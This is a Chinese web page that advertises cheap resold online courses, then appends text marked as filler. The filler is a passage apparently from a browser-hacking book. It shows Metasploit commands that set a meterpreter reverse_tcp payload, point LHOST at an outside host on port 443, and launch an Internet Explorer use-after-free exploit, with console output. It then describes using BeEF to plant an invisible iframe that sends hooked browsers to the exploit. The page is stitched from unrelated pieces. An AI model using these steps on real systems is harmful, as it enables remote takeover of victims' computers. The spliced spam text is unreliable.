这个课这里有,还有同类更多课
加发暗号【拼课】低价学
号:
RECOMMEND
好课推荐
分布式事务实践 解决数据一致性
推荐课程可以扫码添加: 获取,海量课程,每周更新几十种,我们一起探讨,共同进步
含大数据、前沿技术、前端开发、后端开发、移动开发、数据分析、架构、人工智能、Python、Java、Android、前端、IOS、C++、大数据、GO、音视频软件测试、产品经理、运维、股票基金、人工智能AI
以下内容为填充,无视即可
另一种shell是反向shell。反向shell也不是没有问题。顾名思义,反向shell就是要连接回你的系统,只要IP地址是可路由的即可。位于NAT或代理之后的主机,通常更容易访问互联网上的主机,反之则不然。反向shell就是根据这个事实而设计的。如果代理是网络的唯一出口,就可能成为反向shell的障碍。好在Metasploit专门为代理设计了两种payload,这就是http和https meterpreter payload(能够通过目标的代理服务器通信)。了解了这些之后,你可以选择自己需要的方案。下面这个例子是直接连接到主机的,因此使用了反向shell:set payload windows/meterpreter/reverse_tcp show options ---SNIP--- Payload options (windows/meterpreter/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC process yes Exit technique: seh, thread, process, none LHOST yes The listen address LPORT 4444 yes The listen port 选择了meterpreter反向TCP shell之后,需要确定三个选项:EXITFUNC、LHOST和LPORT。EXITFUNC有几种可能,可以在当前应用中分出一个新线程,分出一个新进程,或者通过错误处理程序来调用它自己。到底为EXITFUNC选择哪一种处理方式,取决于应用是否会崩溃。使用利用的默认选项通常是最优选择。对LHOST而言,就是要设置你的IP地址。而LPORT则是大多数主机都可以畅通无阻地访问到的一个端口,因此应该选择443(如果你不确定连接的层次),或者如果没有任何端口被封,也可以随机选择一个:msf exploit(ie_cgenericelement_uaf) > set LHOST browserhacker.com LHOST => 192.168.1.132 msf exploit(ie_cgenericelement_uaf) > set LPORT 443 LPORT => 443 msf exploit(ie_cgenericelement_uaf ) > exploit [*] Exploit running as background job. [*] Started reverse handler on 192.168.1.132:443 [*] Using URL: :80/single [*] Local IP: :80/single [*] Server started. 好了,现在服务器开始运行并等待连接了。最后一步是使用BeEF将浏览器导向利用。在BeEF中有几种方法可以做到这一点,但能够保持勾连浏览器不会失败的一种最有效方式,就是启动一个隐藏的内嵌框架。为此,在Online Browsers面板中选中浏览器,并在Command选项卡中打开Misc文件夹。选择Create Invisible IFrame模块。接下来把URL放到Metasploit服务器的80端口。在这个例子中,URL就是:80/single。最后,单击右下角Execute按钮,就会在勾连浏览器中创建内嵌框架,设置过程如图6-32所示。